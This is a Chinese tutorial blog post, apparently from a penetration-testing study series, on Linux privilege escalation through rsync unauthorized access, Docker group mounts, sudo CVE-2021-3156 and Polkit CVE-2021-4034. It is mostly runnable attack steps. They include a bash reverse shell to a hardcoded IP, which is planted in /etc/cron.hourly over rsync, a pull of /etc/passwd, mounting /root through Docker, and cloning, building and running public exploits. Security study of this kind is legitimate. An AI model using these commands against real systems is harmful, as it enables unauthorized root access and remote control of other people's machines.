首页 > 系统相关 >第105天:权限提升-Linux系统&Docker挂载&Rsync未授权&Sudo-CVE&Polkit-CVE

第105天:权限提升-Linux系统&Docker挂载&Rsync未授权&Sudo-CVE&Polkit-CVE

时间:2024-10-12 21:33:27浏览次数:7  
标签:Rsync Sudo rsync 2021 Linux 挂载 docker CVE

演示案例

Linux-Rsync未授权访问覆盖-本地

Linux-Docker组用户挂载目录-本地

Linux-Sudo(CVE-2021-3156)-本地

Linux-Polkit(CVE-2021-4034)-本地

Rsync(未授权访问)

Rsync是linux下一款数据备份工具,默认开启873端口
https://vulhub.org/#/environments/rsync/common/
借助Linux默认计划任务调用/etc/cron.hourly,利用rsync连接覆盖
-验证:rsync rsync://ip:873/
-提权过程:
1、创建一个nc文件,内容
#!/bin/bash
/bin/bash -i >& /dev/tcp/47.94.236.117/3333 0>&1
2、赋予执行权限:
chmod +x nc
3、上传文件覆盖定时任务目录下
rsync -av nc rsync://47.94.236.117:873/src/etc/cron.hourly
3.1、下载文件
rsync -av rsync://47.94.236.117:873/src/etc/passwd ./
4、进行nc 监听相应的端口
nc -lvnp 3333

Docker组挂载

普通用户在docker组,利用docker服务启动镜像挂载目录
从而来访问root目录、etc目录等敏感文件来进行权限提升。
-复现:创建用户归类目录,添加到docker组
useradd -d /home/test -m test
passwd test
usermod -G docker test
newgrp docker
-利用:
docker run -v /root:/mnt -it alpine
主要的作用是:从Docker上面下载alpine镜像,然后运行;
-v将容器外部的目录/root挂载到容器内部/mnt,使用-it参数进入容器shell。
(个人理解就是普通用户test通过docker挂载把/root目录挂载到了容器内部,其本来是不能访问/root目录的,
现在可以通过访问容器内部挂载的目录实现越权,并能实现创建、修改等操作)

SUDO(CVE-2021-3156)

sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1
-判断:sudoedit -s / (报错:不是常规文件)
-利用:
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
chmod a+x sudo-hax-me-a-sandwich
./sudo-hax-me-a-sandwich 1

Polkit(CVE-2021-4034)

漏洞影响2009年5月至今的所有polkit版本
由于polkit是系统预装工具,所有存在polkit的linux系统均受影响
如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等
-判断:dpkg -l policykit-1
-利用:
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034/
make
./cve-2021-4034

标签:Rsync,Sudo,rsync,2021,Linux,挂载,docker,CVE
From: https://www.cnblogs.com/dummy6acker/p/18461537

相关文章

  • Code-Projects Hospital Management System SQL注入漏洞(CVE-2024-8368)复现
    参考文献:code-projects使用PHP的医院管理系统,源代码v1.0/hms/doctor/index.phpSQL注入·问题#1·青銮机器人/CVE·GitHub的国家信息安全漏洞库(cnnvd.org.cn)免责声明本文仅用于安全研究和学习目的。请勿将文中提供的漏洞复现方法、脚本或其他信息用于未经授......
  • 安全:列出linux中可登录shell/ssh/sudo的用户
    一,列出可登录shell的用户root@lhdpc:~#grepbash/etc/passwdroot:x:0:0:root:/root:/bin/bashliuhongdi:x:1000:1000:liuhongdi,,,:/home/liuhongdi:/bin/bash只显示用户名:root@lhdpc:~#grepbash/etc/passwd|cut-d:-f1rootliuhongdi也可以把常见的3个不允许登录......
  • DATAGERRY REST API身份验证绕过漏洞(CVE-2024-46627)
    0X01产品描述:        ‌DATAGERRY是一个灵活的开源CMDB和资产管理工具,它完全将数据模型的定义留给用户。‌用户只需在一个易于使用的webfrontend中定义自己的对象类型(如服务器、路由器、租赁线路、位置等)。通过DATAGERRY的导出API,存储在DATAGERRY中的CMDB对象可以轻......
  • 备份服务rsync
    1.备份服务目标1.备份服务应用场景2.两台机器之间传输数据的命令:scp,rsync3.备份服务使用流程.服务端,客户端.4.服务使用流程中的排错(总结至少5个故障与排查流程).5.备份项目:所有服务器数据备份,在备份服务器检查,邮件发送结果.2.备份服务概述2.1目标目标:主要解决数......
  • pgadmin4敏感信息泄露 CVE-2024-9014
    0x01产品描述:        pgAdmin是全球最先进的开源数据库Postgres的领先开源管理工具。 pgAdmin4旨在满足新手和经验丰富的Postgres用户的需求,提供了强大的图形界面,可简化数据库对象的创建,维护和使用。其可以在Linux,Unix,macOS和Windows上使用,以管理PostgreSQL和EDBA......
  • CVE-2021-41773目录穿越漏洞复现并利用得到flag
    前提概要首先!遇到一道题目,根据题意可知:这道题目存在CVE-2021-41773漏洞。​先来了解一下CVE-2021-41773的漏洞原理:漏洞原理CVE-2021-41773是一个影响ApacheHTTPServer(httpd)的安全漏洞,影响版本为2.4.49版本。它是一个路径遍历漏洞,如果文档根目录以外的文件不受requi......
  • ICMP timestamp请求响应漏洞CVE-1999-0524解决方法
    ICMPtimestamp请求响应漏洞CVE-1999-0524解决方法1、添加进和出的规则firewall-cmd--permanent--direct--add-ruleipv4filterINPUT0-pICMP--icmp-typetimestamp-request-mcomment--comment"denyICMPtimestamp"-jDROPfirewall-cmd--permanent--direct--ad......
  • 使用rsync命令同步两台服务器之间的文件
    rsync是一种非常常用的文件同步工具,能够在两台服务器之间高效地同步文件和目录。它支持增量传输,只同步发生了变化的文件部分,极大提升了传输效率。以下是使用rsync命令同步两台服务器之间文件的步骤与详细示例。前提条件两台服务器,假设它们的IP分别为ServerA:192.16......
  • CVEN9612 – Catchment Modelling
    CVEN9612–CatchmentModellingAssignment1Part1–Rainfall-RunoffModelingandRoutinghispartoftheassignmentisworth15%ofthetotalgradeforCVEN9612.TheassignmentanswersaretobesubmittedonlineinMoodleasashortreport.Assignment1......
  • LDAP学习笔记之八:openLDAP sudo权限
    一、openLDAPsudo权限常见属性sudoCommand:可执行的二进制命令,如useradd、userdel、mount、umount等。sudoHost:可在哪些机器上执行sudoCommand定义的BASH命令。sudoNotAfter:起始时间sudo规则匹配。sudoNotBefore:结束时间sudo规则匹配。sudoOption:定义超过自身权限及切换至......